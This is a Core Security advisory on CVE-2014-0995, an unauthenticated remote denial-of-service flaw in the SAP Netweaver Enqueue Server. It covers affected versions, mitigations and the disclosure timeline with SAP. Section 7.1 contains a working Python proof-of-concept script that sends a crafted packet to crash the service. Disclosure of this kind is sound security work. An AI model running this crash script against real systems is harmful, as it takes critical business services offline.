[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[CORE-2014-0007] -SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability

1. **Advisory Information**

Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service
Vulnerability
Advisory ID: CORE-2014-0007
Advisory URL: 
http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
Date published: 2014-10-15
Date of last update: 2014-10-15
Vendors contacted: SAP
Release mode: Coordinated release

2. **Vulnerability Information***
*
Class: Uncontrolled Recursion [CWE-674]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0995

3. **Vulnerability Description**

        SAP Netweaver [1] is a technology platform for building and integrating 
SAP business
        applications. A vulnerability has been found in SAP Netweaver that 
could allow an
        unauthenticated, remote attacker to create denial of service 
conditions. The vulnerability
        is triggered by sending a specially crafted SAP Enqueue Server packet 
to remote TCP port 32NN
        (NN being the SAP system number) of a host running the "Standalone 
Enqueue Server" service, part
        of SAP Netweaver Application Server ABAP/Java. The "Standalone Enqueue 
Server" is a critical
        component of a SAP Netweaver installation in terms of availability, 
rendering the whole SAP
        system unresponsive.

4. **Vulnerable Packages**

   . SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503).
   . SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869).

    Other versions are probably affected too, but they were not checked.

5. **Vendor Information, Solutions and Workarounds**

        Martin Gallo proposed the following actions to mitigate the impact of 
the vulnerabilities:

        Restrict access to the Standalone Enqueue service by configuring Access 
Control Lists [4] and to
        the Standalone Enqueue Service TCP port 32XX (XX is the instance 
number).

        SAP published a security note [3] with the fix.

6. **Credits**

      This vulnerability was discovered and researched by Martin Gallo from 
Core Security Consulting
      Services. The publication of this advisory was coordinated by Joaquín 
Rodríguez Varela from Core
      Advisories Team.

7. **Technical Description / Proof of Concept Code**

      When the trace level of the service is configured to stop logging when a 
pattern is found [2], the
      service does not properly control the amount of recursion resulting in a 
stack overflow exception.
      The vulnerability can be triggered remotely by setting the trace level 
with a wildcard Trace Pattern.
      This vulnerability could allow a remote, unauthenticated attacker to 
conduct a denial of service
      attack against the vulnerable systems, rendering the Enqueue Server 
unavailable.

      The following python code can be used to trigger the vulnerability:

7.1. **Proof of Concept**

/-----
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",
default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port
number", default=3200)
(options, args) = parser.parse_args()

def send_packet(sock, packet):
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)

# Connect
print "[*] Connecting to", options.hostname, "port", options.port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))

print "[*] Sending crash packet"

crash = '\xab\xcd\xe1\x23'  # Magic bytes
crash+= '\x00\x00\x00\x00'  # Id
crash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b'  # Packet/frag length
crash+= '\x03\x00\x00\x00'  # Destination/Opcode/MoreFrags/Type
crash+= 'ENC\x00'  # Admin Eye-catcher
crash+= '\x01\x00\x00\x00'  # Version
crash+= '#EAA'  # Admin Eye-catcher
crash+= '\x01\x00\x00\x00\x00'  # Len
crash+= '\x06\x00\x00\x00\x00\x00'  # Opcode/Flags/RC
crash+= '#EAE'  # Admin Eye-catcher
crash+= '\x01\x04\x00\x00'  # Version/Action/Limit/Tread
crash+= '\x00\x00\x00\x00'
crash+= '\x00\x00\x00\x03\x00\x00\x00\x03'  # Trace Level
crash+= '\x01'  # Logging
crash+= '\x01\x40\x00\x00'  # Max file size
crash+= '\x00\x00\x00\x01\x00\x00\x00\x01'  # No. patterns
crash+= '\x00\x00\x00\x25#EAH'  # Trace Eye-catcher
crash+= '\x01*\x00'  # Trace Pattern
crash+= '#EAD'  # Trace Eye-catcher

send_packet(connection, crash)
print "[*] Crash sent !"
-----/

8. **Report Timeline**

. 2014-06-02:

        Initial notification sent to SAP, including technical description to 
reproduce the
        vulnerability. Publication date set to Jun 30, 2014.

. 2014-06-03:

        Vendor notifies that the tracking number 1153917-2014 was created for 
this issue.

. 2014-06-26:

        Core Security requests SAP to inform the status of the advisory.

. 2014-06-30:

        The vendor informs they were not able to reproduce the issue and they 
request additional
        details and a proof of concept.

. 2014-06-30:

        Core Security sends SAP a full description of the vulnerability 
including a python script
        to trigger it.

. 2014-07-11:

        Core Security asks if the vendor was able to trigger the vulnerability. 
Additinally we
        requested to set a publication date for the advisory based on the 
release of a fix.

. 2014-07-14:

        The vendor informs they were able to reproduce the issue but they will 
not be able to
        provide a timeline for the fix at the time. They inform they will work 
with high priority
        on it and will inform us of the planned fix release date.

. 2014-08-12:

        Core Security asks if the vendor was able to develop a fix and if they 
have a possible
        timeline for its availability.

. 2014-08-13:

        The vendor informs that the fix is undergoing quality checks. They also 
inform that
        they can't provide an exact date of publication yet. They also request 
a 3 months grace
        period once the patch is available.

. 2014-08-13:

        Core Security informs SAP that after we get notice that the fix is 
available to the
        public we will publish the advisory accordingly and will not wait for 
the 3 months of
        grace as requested because that's not our proceeding policy.

. 2014-08-18:

        The vendor informs that the fix is going to be released with the
        October patch day, on Tuesday the 14th, of 2014.

. 2014-10-14:

        The vendor publishes the fix under the security note 2042845.

. 2014-10-15:

        Core Security releases the advisory.

9. **References**

[1] http://www.sap.com/platform/netweaver/index.epx.
[2]http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm
[3] SAP security note 2042845
[4] https://websmp230.sap-ag.de/sap/support/notes/1495075.

10. **About CoreLabs**

        CoreLabs, the research center of Core Security, is charged with
        anticipating the future needs and requirements for information security
        technologies. We conduct our research in several important areas of 
computer
        security including system vulnerabilities, cyber attack planning and
        simulation, source code auditing, and cryptography. Our results include 
problem
        formalization, identification of vulnerabilities, novel solutions and 
prototypes
        for new technologies. CoreLabs regularly publishes security advisories, 
technical 
        papers, project information and shared software tools for public use at:
        http://corelabs.coresecurity.com.

11. **About Core Security**

        Core Security enables organizations to get ahead of threats with
        security test and measurement solutions that continuously identify and
        demonstrate real-world exposures to their most critical assets. Our
        customers can gain real visibility into their security standing, real
        validation of their security controls, and real metrics to more 
effectively
        secure their organizations.

        Core Security's software solutions build on over a decade of trusted
        research and leading-edge threat expertise from the company's Security
        Consulting Services, CoreLabs and Engineering groups. Core Security
        can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.

12. **Disclaimer**

        The contents of this advisory are copyright (c) 2014 Core Security 
        and (c) 2014 CoreLabs, and are licensed under a Creative Commons 
Attribution
        Non-Commercial Share-Alike 3.0 (United States) License:
        http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. **PGP/GPG Keys**

        This advisory has been signed with the GPG key of Core Security
        advisories team, which is available for download at
        
        
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.